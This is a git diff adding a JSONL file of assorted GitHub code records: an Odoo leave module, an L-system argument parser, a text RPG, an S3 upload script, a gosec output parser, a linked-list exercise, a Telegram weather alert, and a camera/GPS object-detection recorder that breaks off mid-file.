diff --git "a/5195.jsonl" "b/5195.jsonl" new file mode 100644--- /dev/null +++ "b/5195.jsonl" @@ -0,0 +1,268 @@ +{"seq_id":"24826159474","text":"from odoo import api, fields, models, _\n\n\nclass PublicTimeOffRefuse(models.Model):\n _inherit = 'hr.leave'\n\n def refuse_public_holiday(self):\n type_off = self.env['hr.leave'].search([])\n for i in type_off:\n if i.holiday_status_id.name == 'Public Holiday':\n if i.state == 'validate':\n i.action_refuse()\n","repo_name":"muhammedmurshid/employee_addons","sub_path":"models/public_time_off_refuse.py","file_name":"public_time_off_refuse.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27735179337","text":"#import our own function\nfrom ls_user_input import getConfigFilename\n\ndef processCommandlineArguments(allArguments):\n \"\"\"\n function that processes commandline arguments\n\n Parameters\n ----------\n allArguments : list\n list of arguments\n\n Returns\n -------\n tuple\n configFilename, iterations, exportImageName, showDrawProcess, useProgressbar, closeAfterDrawing, useRandomConfig, useWebsite, exportSvg\n str int str bool bool bool bool bool bool\n name of config file name of export image use a progressbar use a random config also convert eps to svg\n amount of iterations show the draw process close after drawing use a website\n \"\"\" \n \n configFilename = iterations = exportImageName = useRandomConfig = useProgressbar = None\n showDrawProcess = closeAfterDrawing = useWebsite = exportSvg = False\n \n helpMessage = \"\"\"\n All commandline options:\n -h or --help Displays help.\n -c or --config Used to give the config file name to the program.\n -i or --iterations [amount] Used to give the amount of iterations to the program.\n -e or --export Exports the turtle drawing to an eps file.\n -s or --output_svg Convert the eps image from eps to svg.\n -sd or --show_draw_process Use this flag to see the turtle move.\n -up or --use_progress_bar Use this flag if you always want a progressbar.\n -np or --no_progress_bar Use this flag if you want no progressbar (e.g. for speed).\n -ca or --close_after_drawing Exit immediately after drawing.\n -rc or --random_config Generate a random l-System.\n -uw or --use_website Generate a website with the latest lSystem drawing.\n \"\"\"\n \n counter = 0\n while counter < len(allArguments)-1:\n counter += 1\n arg = allArguments[counter]\n \n if arg == \"--help\" or arg == \"-h\":\n print(helpMessage)\n exit(0)\n \n elif arg == \"--export\" or arg == \"-e\":\n counter += 1\n try: arg = allArguments[counter]\n except IndexError:\n exportImageName = \"\"\n if arg[0] == \"-\" or arg == \"\":\n counter -= 1\n exportImageName = \"\"\n else:\n exportImageName = arg\n \n elif arg == \"--iterations\" or arg == \"-i\":\n counter += 1\n try: arg = allArguments[counter]\n except IndexError:\n print(\"Missing an argument.\")\n exit(0)\n if arg[0] == \"-\" or arg == \"\":\n counter -= 1\n else:\n try: iterations = int(arg)\n except KeyError: \n print(\"--iterations must be followed by a positive integer.\")\n exit(0)\n \n elif arg == \"--config\" or arg == \"-c\":\n counter += 1\n try: arg = allArguments[counter]\n except IndexError:\n print(\"Missing an argument.\")\n exit(0)\n if arg[0] == \"-\" or arg == \"\":\n counter -= 1\n else:\n configFilename = getConfigFilename(arg)\n \n elif arg == \"-rc\" or arg == \"--random_config\":\n useRandomConfig = \"Default\"\n counter += 1\n try: \n arg = allArguments[counter]\n except IndexError:\n useRandomConfig = \"Default\"\n if arg[0] == \"-\" or arg == \"\":\n counter -= 1\n else:\n useRandomConfig = arg\n \n elif arg == \"-sd\" or arg == \"--show_draw_process\":\n showDrawProcess = True\n \n elif arg == \"-up\" or arg == \"--use_progress_bar\":\n useProgressbar = True\n \n elif arg == \"-np\" or arg == \"--no_progress_bar\":\n useProgressbar = False\n \n elif arg == \"-ca\" or arg == \"--close_after_drawing\":\n closeAfterDrawing = True\n\n elif arg == \"-uw\" or arg == \"--use_webiste\":\n useWebsite = True\n\n elif arg == \"-s\" or arg == \"--output_svg\":\n exportSvg = True\n\n else:\n print(f\"Unknown argument: '{arg}' Use --help for help.\")\n exit(0)\n \n if useWebsite and exportImageName is None:\n exportImageName = \"\"\n \n if exportSvg:\n exportImageName = \"\"\n \n return configFilename, iterations, exportImageName, showDrawProcess, useProgressbar, closeAfterDrawing, useRandomConfig, useWebsite, exportSvg\n ","repo_name":"Quinten-Steeland-KuLeuven/l-systems","sub_path":"ls_commandline_arguments.py","file_name":"ls_commandline_arguments.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29679928288","text":"import random\n\nclass Base:\n def __init__(self, name, health, mana):\n self.atHP = health\n self.atMN = mana\n self.name = name\n self.str = \"X\"\n\n self.PosX = 0\n self.PosY = 0\n\n self.damage = 5\n self.enable = 1 #1 - включено, 0 - выколючено (мертво)\n\n #Делаем систему миссов\n self.miss = 0.1\n\n def hit(self, damage):\n if damage == 0:\n return\n\n #Система миссов (уклонения)\n if random.randint(0, 100) > self.miss * 100:\n self.atHP -= damage\n if self.atHP <= 0:\n self.enable = 0\n else:\n print(f'{self.name} получил урон {damage}, текущее здоровье {self.atHP}')\n else:\n print(f'{self.name} увернулся от атаки, текущее здоровье {self.atHP}')\n\n\n def setPos(self, X, Y):\n self.PosX = X\n self.PosY = Y\n\nclass BaseHero(Base):\n def __init__(self, name, health, mana):\n super().__init__(name, health, mana)\n self.miss = 0.3\n\n def drink_heal_potion(self, potion):\n self.atHP += potion\n print(f'{self.name} drink Health Potion')\n\n def drink_mana_potion(self, potion_mana):\n self.atMN += potion_mana\n print(f'{self.name} drink Mana Potion')\n\n def tryEat(self, Eat):\n if Eat is None :\n return\n\n if Eat.enable == 0:\n return\n\n if Eat.str == 'M':\n self.drink_mana_potion(20)\n if Eat.str == 'H':\n self.drink_heal_potion(20)\n\n\nclass Hero(BaseHero):\n def __init__(self, name, health, mana):\n super().__init__(name, health, mana)\n self.atSila = 10\n self.atInt = 5\n self.atLov = 5\n self.atExp = 0\n self.atLvl = 0\n\n self.type = 0\n self.atGuns = None\n self.items = []\n\n def status(self):\n print(f'Sila:{self.atSila}\\nInt:{self.atInt}\\nLov:{self.atLov}\\nExp:{self.atExp}\\nLvl:{self.atLvl}\\n')\n\n def scream(self):\n print(f'Я будущий герой {self.name}, но я не выбрал специальность.')\n cmd = input('1 - воин, 2 - маг, 3 - лучник, 4 - травник: ')\n if cmd == '1':\n self.type = 1\n elif cmd == '2':\n self.type = 2\n elif cmd == '3':\n self.type = 3\n elif cmd == '4':\n self.type = 4\n\n def attack(self, target, damage):\n if self.type == 0:\n print(f'Я будущий герой {self.name}, и я без оружия, но я нанес {target.name} урон {damage} своими руками')\n else:\n print(f'Я будущий герой {self.name}, c помощью {self.atGuns}, я нанес {target.name} урон {damage}')\n target.hit(damage)\n\n if target.atHP <= 0:\n print(f'{target.name} повержен, получено 10 очков опыта')\n self.AddExp(10)\n\n def AddExp(self, count):\n self.atExp += count\n if self.atExp == 100:\n self.atLvl += 1\n self.LVLUP()\n self.atExp -= 100\n\n def LvlUP(self):\n return\n\n\nclass Voin(Hero):\n def __init__(self, health, mana, name='Ричард'):\n super().__init__(name, health, mana)\n self.atGuns = 'Guns: Меч'\n self.damage = 20\n\n def status(self):\n self.scream()\n super().status()\n\n def LvlUP(self):\n self.atSila += 3\n self.atLov += 2\n self.atInt += 1\n\n def scream(self):\n print(f'Я герой {self.name} и я воин с {self.atGuns}')\n\n\nclass Mag(Hero):\n def __init__(self, health, mana, name='Ричард'):\n super().__init__(name, health, mana)\n self.atGuns = 'Guns: Посох'\n self.zaklinania = []\n\n def status(self):\n self.scream()\n super().status()\n\n def scream(self):\n print(f'Я маг герой {self.name} и я знаю {len(self.zaklinania)} заклинаний')\n\n def LvlUP(self):\n self.atSila += 1\n self.atLov += 2\n self.atInt += 4\n\n def add_magic(self, magic):\n self.zaklinania.append(magic)\n\nclass Archier(Hero):\n def __init__(self, health, mana, name='Ричард'):\n super().__init__(name, health, mana)\n self.atGuns = 'Guns: Лук'\n self.damage = 6\n\n def status(self):\n self.scream()\n super(Archier, self).status()\n\n def scream(self):\n print(f'Я герой {self.name} и я лучник с {self.atGuns}')\n\n\nclass NPC(BaseHero):\n def __init__(self, health, mana, lvl, name='Давид'):\n super().__init__(name, health, mana)\n self.atLVL = lvl\n\n def status(self):\n super().status()\n print(f'LVL: 1')\n\n def scream(self):\n print(f'Я {self.name} обычный NPC!')\n\n\nclass Travnik(NPC):\n def __init__(self, health, mana, lvl, name='Боб'):\n super().__init__(health, mana, lvl, name)\n self.damage = 0\n self.items = []\n\n def status(self):\n super().status()\n print(f'{self.atLVL}')\n\n def scream(self):\n print(f'Я {self.name} обычный травник!” ')\n\n def job(self, target, heal_potion):\n #Некоректые задачи для job и make_potion\n return\n\n def make_potion(self, heal_potion, heal_power):\n heal_potion.power = heal_power\n self.items.append(heal_potion)\n\nclass Kuznic(NPC):\n def __init__(self, health, mana, lvl, name='Колька'):\n super().__init__(health, mana, lvl, name)\n self.damage = 4\n\n def status(self):\n super().status()\n print(f'{self.atLVL}')\n\n def scream(self):\n print(f'Я {self.name} обычный кузнец!” ')\n\n def make_item(self, target, item):\n target.items.appened(item)\n\nclass Torgovec(NPC):\n def __init__(self, health, mana, lvl, name='Анакендий'):\n super().__init__(health, mana, lvl, name)\n self.damage = 4\n\n def status(self):\n super().status()\n print(f'{self.atLVL}')\n\n def scream(self):\n print(f'Я {self.name} обычный торговец!” ')\n\n def make_item(self, target, item):\n target.items.appened(item)\n\nclass Volshebnik(NPC):\n def __init__(self, health, mana, lvl, name='Гоша'):\n super().__init__(health, mana, lvl, name)\n self.damage = 4\n\n def status(self):\n super().status()\n print(f'{self.atLVL}')\n\n def scream(self):\n print(f'Я {self.name} обычный странствующий волшебника!” ')\n\n def make_item(self, target, item):\n target.items.appened(item)\n\nclass Enemy(Base):\n def __init__(self, name, health, mana, lvl):\n super().__init__(name, health, mana)\n self.lvl = lvl\n self.items = [Item(5)]\n self.isBoss = 0\n\n def Attack(self, target):\n target.hit(self.damage);\n print(f'{self.name} аттаковал {target.name}, нанёс {self.damage}, осталось {target.atHP}')\n\nclass Zombie(Enemy):\n def __init__(self, name, health, mana, lvl):\n super().__init__(name, health, mana, lvl)\n self.lvl = lvl\n self.items = [Item(10)]\n\n def Attack(self, target):\n target.hit(target.atMN / 5)\n print(f'{self.name} аттаковал {target.name}, нанёс {self.damage}, осталось {target.atHP}')\n\nclass Item:\n def __init__(self, count, id=0, name='монета'):\n self.name = name\n self.count = count\n self.id = id\n\nclass Bess(Enemy):\n def __init__(self, name, health, mana, lvl):\n super().__init__(name, health, mana, lvl)\n self.damage = 20\n self.isBoss = 1\n self.items = [Item(100)]\n\n def Attack(self, target):\n target.hit(self.damage);\n print(f'{self.name} аттаковал {target.name}, нанёс {self.damage}, осталось {target.atHP}')\n if random.randint(0, 100) < 30:\n self.steal_mana(target)\n\n def steal_mana(self, target):\n target.atMN -= 5\n print(f'{self.name} съел ману у {target.name}, кол-во: {self.damage}, осталось: {target.atMN}')\n\nclass Gameplay:\n def EnemySpawn(self):\n\n count = random.Random.randint(random, 0, self.EnemyCount / 2)\n for i in range(count):\n enemy = Zombie('Зомби', 100, 50, 5)\n enemy.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n enemy.str = 'z'\n\n self.Enemy.append(enemy)\n\n for i in range(self.EnemyCount - count):\n enemy = Enemy('Пират', 100, 50, 5)\n enemy.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n enemy.str = 'O'\n\n self.Enemy.append(enemy)\n\n\n enemy = Bess(\"Босс\", 200, 100, 40)\n enemy.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n enemy.str = '#'\n\n self.Enemy.append(enemy)\n self.EnemyCount += 1\n\n def BuffsSpawn(self):\n ManaCount = random.Random.randint(random, 0, self.BuffsCount / 2)\n\n for i in range(ManaCount):\n buff = Base(1, 0, \"Health Buff\")\n buff.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n\n buff.damage = 0\n buff.str = 'H'\n\n self.Buffs.append(buff)\n\n for i in range(self.BuffsCount - ManaCount):\n buff = Base(1, 0, \"Mana Buff\")\n buff.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n\n buff.damage = 0\n buff.str = 'M'\n\n self.Buffs.append(buff)\n\n def NPCSpawn(self):\n travnik = Travnik(100, 50, random.randint(10, 50))\n travnik.str = '😤'\n travnik.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n self.NPC.append(travnik)\n\n travnik = Kuznic(100, 50, random.randint(10, 50))\n travnik.str = '🔨'\n travnik.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n self.NPC.append(travnik)\n\n travnik = Torgovec(100, 50, random.randint(10, 50))\n travnik.str = '👳'\n travnik.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n self.NPC.append(travnik)\n\n travnik = Volshebnik(100, 50, random.randint(10, 50))\n travnik.str = '⭐'\n travnik.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n self.NPC.append(travnik)\n\n def __init__(self):\n self.Enemy = []\n self.Buffs = []\n self.NPC = []\n\n self.BuffsCount = 10\n self.Width = 40\n self.Height = 10\n self.EnemyCount = 30\n\n self.BuffsSpawn()\n self.EnemySpawn()\n self.NPCSpawn()\n\n self.atStep = 1\n\n self.atKarta = [['_' for j in range(self.Width)] for i in range(self.Height)]\n\n self.hero = Hero('Ричард', 100, 50)\n self.hero.setPos(3, 3)\n self.atKarta[self.hero.PosY][self.hero.PosX] = self.hero.str\n for i in range(self.EnemyCount):\n self.atKarta[self.Enemy[i].PosY][self.Enemy[i].PosX] = \"O\"\n\n print('Игра началась')\n self.start()\n\n def start(self):\n self.hero.scream()\n\n hero = self.hero\n if self.hero.type == 1:\n hero = Voin(200, 50, hero.name)\n elif self.hero.type == 2:\n hero = Mag(200, 50, hero.name)\n elif self.hero.type == 3:\n hero = Archier(200, 50, hero.name)\n\n hero.setPos(self.hero.PosX, self.hero.PosY)\n hero.type = self.hero.type\n self.hero = hero\n\n self.interface()\n\n while True:\n #Проверка врагов\n Enemy = None\n\n for i in range(self.EnemyCount):\n if(self.Enemy[i].PosX == self.hero.PosX):\n if(self.Enemy[i].PosY == self.hero.PosY):\n if(self.Enemy[i].enable == 1):\n Enemy = self.Enemy[i]\n\n\n cmd = input('Action:')\n if cmd == '1':\n self.walk()\n elif cmd == '3':\n self.hero.status()\n continue\n elif cmd == '2':\n #Смотрим по бафам и ищем баф, с теми координатами, где стоит игрок\n Eat = None\n for i in range(self.BuffsCount):\n if (self.Buffs[i].PosX == self.hero.PosX):\n if (self.Buffs[i].PosY == self.hero.PosY):\n if(self.Buffs[i].enable == 1):\n Eat = self.Buffs[i]\n\n self.hero.tryEat(Eat)\n\n #Если тут был враг, то бьём игрока\n if Enemy != None:\n self.hero.hit(Enemy.damage)\n elif cmd == '4':\n if Enemy is not None:\n self.hero.attack(Enemy, self.hero.damage)\n\n if Enemy.enable == 1:\n self.hero.hit(Enemy.damage)\n if self.hero.atHP <= 0:\n print(f'Выс убили, и вы проиграли. Game over')\n return\n elif Enemy.isBoss == 1:\n print(f'Поздравляю вы прошли игру, игра закончена')\n return\n else:\n print(f'За убийтсво {Enemy.name} вы получили:')\n for i in range(len(Enemy.items)):\n print(f'{Enemy.items[i].name}: {Enemy.items[i].count}')\n\n elif cmd == 'break':\n print(f'Игра прервана')\n return\n else:\n print(\"Нет такой команды\")\n self.interface()\n self.atStep += 1\n\n def interface(self):\n for i in range(self.BuffsCount):\n if self.Buffs[i].enable == 1:\n self.atKarta[self.Buffs[i].PosY][self.Buffs[i].PosX] = self.Buffs[i].str\n\n for i in range(self.EnemyCount):\n if self.Enemy[i].enable == 1:\n self.atKarta[self.Enemy[i].PosY][self.Enemy[i].PosX] = self.Enemy[i].str\n\n for i in range(4):\n self.atKarta[self.NPC[i].PosY][self.NPC[i].PosX] = self.NPC[i].str\n\n self.atKarta[self.hero.PosY][self.hero.PosX] = 'X'\n\n print(f'Step:{self.atStep}')\n for s in self.atKarta: # Визуализация карты вместо print(*self.atKarta)\n print(*s)\n print(f'1 - walk, 2 - eat, ...')\n\n def walk(self):\n cmd = input('1 - left, 2 - right, 3 - up, 4 - down:')\n # горизонталь ось X\n self.atKarta[self.hero.PosY][self.hero.PosX] = '_'\n\n if cmd == '2':\n self.hero.PosX += 1\n if cmd == '1':\n self.hero.PosX -= 1\n # вертикаль ось Y\n if cmd == '3':\n self.hero.PosY -= 1\n if cmd == '4':\n self.hero.PosY += 1\n\n self.atKarta[self.hero.PosY][self.hero.PosX] = self.hero.str\n\nGameplay()","repo_name":"GeToNIX531/pyCharm1","sub_path":"lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":16048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12885042351","text":"\nfrom argparse import ArgumentParser\nimport boto3\nimport logging\nfrom multiprocessing.pool import ThreadPool\nimport math\n\nfrom ratelimit import Ratelimit\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass FRPCFormatter(logging.Formatter):\n \"\"\"FRPC colored logging formatter.\"\"\"\n\n BOLD_RED = \"\\033[1;31m\"\n BOLD_GREEN = \"\\033[1;32m\"\n BOLD_YELLOW = \"\\033[1;33m\"\n BOLD_CYAN = \"\\033[1;36m\"\n BOLD_WHITE = \"\\033[1;37m\"\n RESET = \"\\033[0m\"\n FORMAT = \"%(asctime)s: {}%(levelname)s{}: %(name)s: %(message)s\"\n\n COLORS = {\n logging.DEBUG: BOLD_WHITE,\n logging.INFO: BOLD_GREEN,\n logging.WARNING: BOLD_YELLOW,\n logging.ERROR: BOLD_RED,\n logging.CRITICAL: BOLD_CYAN,\n }\n\n def format(self, record):\n \"\"\"Format a logging record.\"\"\"\n try:\n escapes = (self.COLORS[record.levelno], self.RESET)\n except KeyError:\n escapes = (\"\",) * 2\n\n fmt = self.FORMAT.format(*escapes)\n\n return logging.Formatter(fmt).format(record)\n\n\nclass CriticalHandler(logging.Handler):\n \"\"\"Custom logging handler that calls `exit(1)` on critical log events.\"\"\"\n\n def createLock(self):\n \"\"\"Stub. No lock required for this handler.\"\"\"\n self.lock = None\n\n def emit(self, record):\n \"\"\"Crash the application on a critical event.\"\"\"\n if record.levelno == logging.CRITICAL:\n sys.exit(1)\n\n\ndef __setup_logging():\n stream_handler = logging.StreamHandler()\n\n stream_handler.setFormatter(FRPCFormatter())\n stream_handler.setLevel(logging.INFO)\n\n critical_handler = CriticalHandler()\n\n logging.basicConfig(level=logging.DEBUG, handlers=[\n stream_handler,\n critical_handler\n ])\n\n\ndef _run_init(ratelimit):\n global _ratelimit # pylint: disable=global-statement\n\n _ratelimit = ratelimit\n\n\ndef _run(entries):\n s3_client = boto3.client(\"s3\")\n\n for entry in entries:\n with _ratelimit:\n s3_client.upload_file(*entry)\n logger.info(f\"{entry} created\")\n\n\ndef main():\n __setup_logging()\n\n argparser = ArgumentParser(\n description=\"create CREQ files for a range of mac addresses\")\n\n argparser.add_argument(\"start\", type=lambda x: int(x, 16))\n argparser.add_argument(\"end\", type=lambda x: int(x, 16))\n argparser.add_argument(\"--threads\", type=int, default=48)\n\n args = argparser.parse_args()\n ratelimit = Ratelimit(0.01)\n s3_client = boto3.client(\"s3\")\n\n with ThreadPool(processes=args.threads, initializer=_run_init,\n initargs=(ratelimit,)) as pool:\n put_args = [\n (\"creqfile\", \"siq-dev-boson-devices\", f\"creq/{i:x}\")\n for i in range(args.start, args.end + 1)\n ]\n\n batch_size = math.ceil(len(put_args) / args.threads)\n partitions = [\n put_args[i: i + batch_size]\n for i in range(0, len(put_args), batch_size)\n ]\n\n for _ in pool.imap_unordered(_run, partitions):\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Sord27/ttt","sub_path":"device/python/LIT-3967/create_creq_files.py","file_name":"create_creq_files.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4112430492","text":"import json\n\nfrom collections import OrderedDict\n\nfrom dusty.tools import markdown\n\n\nclass GosecOutputParser:\n \"\"\" Parses gosec output and populates finding list \"\"\"\n\n def __init__(self, output):\n self.items = list()\n # Parse JSON from gosec stdout\n data = json.loads(output)\n # Populate findings\n all_items = OrderedDict()\n for item in data[\"Issues\"]:\n # Prepare finding item\n title = f\"{item['details']} - in {item['file']}\"\n if title not in all_items:\n tool = \"gosec\"\n severity = item[\"severity\"]\n file_path = item[\"file\"]\n description = \\\n f\"{markdown.markdown_escape(item['details'])}\\n\\n\" \\\n f\"**Rule ID**: {markdown.markdown_escape(item['rule_id'])}\\n\\n\" \\\n f\"**Confidence**: {markdown.markdown_escape(item['confidence'])}\"\n steps_to_reproduce = list()\n all_items[title] = {\n \"title\": title,\n \"severity\": severity,\n \"file_path\": file_path,\n \"description\": description,\n \"steps_to_reproduce\": steps_to_reproduce\n }\n # Fill steps to reproduce\n finding = all_items[title]\n finding['steps_to_reproduce'].append(\n f\"
\" \\\n                f\"Location: {item['file']}:{item['line']}\\n\" \\\n                f\"Code:\\n{item['code']}\" \\\n                f\"
\"\n )\n # Populate items\n for key in all_items:\n self.items.append(all_items[key])\n","repo_name":"carrier-io/dusty","sub_path":"dusty/scanners/sast/gosec/legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71383614916","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.random = None\n\n\nclass LinkedList:\n def __init__(self, node):\n self.head = node\n\n # Method to print the list.\n def __repr__(self):\n temp = self.head\n while temp is not None:\n random = temp.random\n random_data = (random.data if\n random is not None else -1)\n\n data = temp.data\n print(\n f\"Data-{data}, Random data: {random_data}\")\n temp = temp.next\n\n return \"\\n\"\n\n def push(self, data):\n node = Node(data)\n node.next = self.head\n self.head = node\n\n\nl = LinkedList(Node(5))\nl.push(4)\nl.push(3)\nl.push(2)\nl.push(1)\n\n# Setting up random references.\nl.head.random = l.head.next.next\nl.head.next.random = l.head.next.next.next\nl.head.next.next.random = l.head.next.next.next.next\nl.head.next.next.next.random = (l.head.next.next.next.next.next)\nl.head.next.next.next.next.random = l.head.next\n# print(l)\ndef clone(origional_list):\n #clone the simple part of list\n temp=origional_list.head\n clone_list=LinkedList(Node(temp.data))\n clone_temp=clone_list.head\n temp=temp.next\n while temp:\n clone_temp.next=Node(temp.data)\n clone_temp=clone_temp.next\n temp=temp.next\n # print(clone_list)\n\n #connect lists\n o=origional_list.head\n ogtemp=o\n o=o.next\n\n c = clone_list.head\n cltemp=c\n c=c.next\n\n while o:\n ogtemp.next=cltemp\n cltemp.next=o\n\n ogtemp = o\n o = o.next\n cltemp = c\n c = c.next\n ogtemp.next = cltemp\n\n print(origional_list)\n\n # connect Rnadom pointers\n oghead=origional_list.head\n ogtemp = oghead\n\n clhead=oghead.next\n cltemp=clhead\n\n while ogtemp:\n if ogtemp.random:\n cltemp.random =ogtemp.random.next\n ogtemp=ogtemp.next.next\n if ogtemp:\n cltemp=cltemp.next.next\n # print(origional_list)\n\n\n #remove old links\n oghead=origional_list.head\n ogtemp = oghead\n\n clhead=oghead.next\n cltemp=clhead\n\n while ogtemp:\n ogtemp.next=ogtemp.next.next\n ogtemp=ogtemp.next\n if ogtemp:\n cltemp.next=cltemp.next.next\n cltemp=cltemp.next\n\n # check\n origional_list=LinkedList(oghead)\n clone_list=LinkedList(clhead)\n print(origional_list)\n print(clone_list)\n\nclone(l)\n\n","repo_name":"ankitjindal7240/DSA_450","sub_path":"LinkedList/clone_with_random.py","file_name":"clone_with_random.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70164384834","text":"import os\nimport requests\n\n# Setup API keys as environment variables\nTELEGRAM_BOT_API_KEY = os.environ.get(\"TELEGRAM_BOT_API_KEY\")\nOPEN_WEATHER_API_KEY = os.environ.get(\"OPEN_WEATHER_API_KEY\")\nMY_LATITUDE = 55.953251\nMY_LONGITUDE = -3.188267\n\n# Call Telegram API to fetch user chat ID\ntelegram_response = requests.get(f\"https://api.telegram.org/bot{TELEGRAM_BOT_API_KEY}/getUpdates\")\ntelegram_response.raise_for_status()\ntelegram_data = telegram_response.json()\ntelegram_chat_id = telegram_data[\"result\"][0][\"message\"][\"chat\"][\"id\"]\n\n# Setup location parameters and API key for OpenWeather API\nweather_parameters = {\n \"lat\": MY_LATITUDE,\n \"lon\": MY_LONGITUDE,\n \"appid\": OPEN_WEATHER_API_KEY,\n \"cnt\": 4\n}\n\nresponse = requests.get(\"https://api.openweathermap.org/data/2.5/forecast\", params=weather_parameters)\nresponse.raise_for_status()\nweather_data = response.json()\n\nwill_rain = False\nfor hour_data in weather_data[\"list\"]:\n condition_code = hour_data[\"weather\"][0][\"id\"]\n if int(condition_code) < 700:\n will_rain = True\n\nif will_rain:\n telegram_parameters = {\n \"chat_id\": telegram_chat_id,\n \"text\": \"Weather forecast for the day is rainy. Bring an Umbrella!\"\n }\n\n response = requests.get(\n f\"https://api.telegram.org/bot{TELEGRAM_BOT_API_KEY}/sendMessage\",\n params=telegram_parameters\n )\n response.raise_for_status()\n","repo_name":"RobertoLJr/100-days-of-python","sub_path":"day-035-project-rain-alert-telegram-notification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23714124300","text":"import tkinter\nimport time\nimport timeit\nimport datetime\nimport threading\nimport multiprocessing\nimport random\nfrom queue import Queue\nimport os\nimport sys\nimport numpy\nfrom GpsCapture import GpsCapture\nfrom See3Cam import See3Cam\nfrom FPS import FPS\nfrom RecordingThreadController import RecordingThreadController\nimport cv2\nfrom GuiPart import GuiPart\nimport serial\nimport serial.tools.list_ports\nimport PIL.Image, PIL.ImageTk\nimport PIL \nfrom PIL import Image\nfrom PIL import ImageTk\nimport subprocess\nfrom subprocess import PIPE\n\n# Importing the libraries for the object detection\nimport torch\nfrom torch.autograd import Variable\nimport cv2\nfrom data import BaseTransform, VOC_CLASSES as labelmap\nfrom ssd import build_ssd\nimport imageio\nimport timeit\nimport time\nfrom statistics import mean\nfrom jproperties import Properties\n\ncuda=torch.cuda.device(0)\nif torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\nelse:\n torch.set_default_tensor_type('torch.FloatTensor')\n\n# Creating the SSD neural network\nnet = build_ssd('test') # We create an object that is our neural network ssd.\nnet.load_state_dict(torch.load('ssd300_mAP_77.43_v2.pth', map_location = lambda storage, loc: storage)) # We get the weights of the neural network from another one that is pretrained (ssd300_mAP_77.43_v2.pth).\n\n# Creating the transformation\ntransform = BaseTransform(net.size, (104/256.0, 117/256.0, 123/256.0)) # We create an object of the BaseTransform class, a class that will do the required transformations so that the image can be the input of the neural network.\n\n\n\nclass ThreadedClient:\n \"\"\"\n Launch the main part of the GUI and the differents threads of the Tool.\n One class responsible of the different control threads \n \"\"\"\n\n def __init__(self, master):\n\n\n \"\"\"\n Start the GUI and the asynchronous threads. We are in the main\n (original) thread of the application, which will later be used by\n the GUI as well.\n \"\"\"\n self.master = master\n self.gps_destination_file_name = \"\"\n self.frames_destination_timestamp =\"\"\n self.video_destination_file_handler = cv2.VideoWriter()\n self.gps_destination_dir = \"/home/knorr-bremse/Projects/Digits4RailMaps/icom_track_gui/GPS/\"\n self.video_destination_dir = \"/home/knorr-bremse/Projects/Digits4RailMaps/icom_track_gui/Videos/\"\n self.record= False\n self.img = None\n self.frame = None\n self.frame1 = None\n self.f = 0\n self.check = False\n self.brahim = 1.0/25\n\n # p = Properties()\n # with open('config.properties', 'rb') as f:\n # p.load(f, 'utf-8')\n\n # print(p[\"video_id\"].data) #### incremtentaiton properties file \n # p[\"video_id\"]=str(int(p[\"video_id\"].data) +1)\n # print(p[\"video_id\"].data)\n # with open('config.properties', 'wb') as f:\n # p.store(f, encoding=\"utf-8\")\n\n self.frame = None\n # Create the gps queue\n self.gps_queue = Queue()\n # principal thread\n self.running = 1\n self.cameras_state = self.find_cam()\n print(self.cameras_state)\n if self.cameras_state[0]:\n self.camera = See3Cam(src=self.cameras_state[1], width=1280, height=720, framerate=30, name=\"CAM\")\n self.camera.start()\n if self.cameras_state[2]:\n self.camera1 = See3Cam(src=self.cameras_state[3], width=1280, height=720, framerate=30, name=\"CAM1\")\n self.camera1.start()\n\n self.fps = FPS()\n \n # Set up Gps\n self.gps = GpsCapture()\n # Set up the GUI part\n self.gui = GuiPart(master, self, self.cameras_state, self.gps.running, self.recordData, self.stopRecord)\n \n\n \n # Set up the thread for the GPS checking\n gps_controller = threading.Thread(target=self.checkGpsConnection, args=(2,))\n gps_controller.setDaemon(True)\n gps_controller.start()\n\n # Set up the thread for the camera checking\n camera_controller = threading.Thread(target=self.checkCameraConnection, args=(2,))\n camera_controller.setDaemon(True)\n camera_controller.start()\n\n # # Set up the thread for the video stream\n # camera_controller = threading.Thread(target=self.readCameraThread, args=(self.brahim,))\n # camera_controller.setDaemon(True)\n # camera_controller.start()\n\n # Set up the thread for the GPS stream\n camera_controller = threading.Thread(target=self.readGpsThread, args=(self.brahim,)) ## refactoring\n camera_controller.setDaemon(True)\n camera_controller.start()\n\n # Set up the Thread for the data recording\n self.recordingThread = RecordingThreadController(self, self.video_destination_dir, self.gps_destination_dir, self.gui)\n 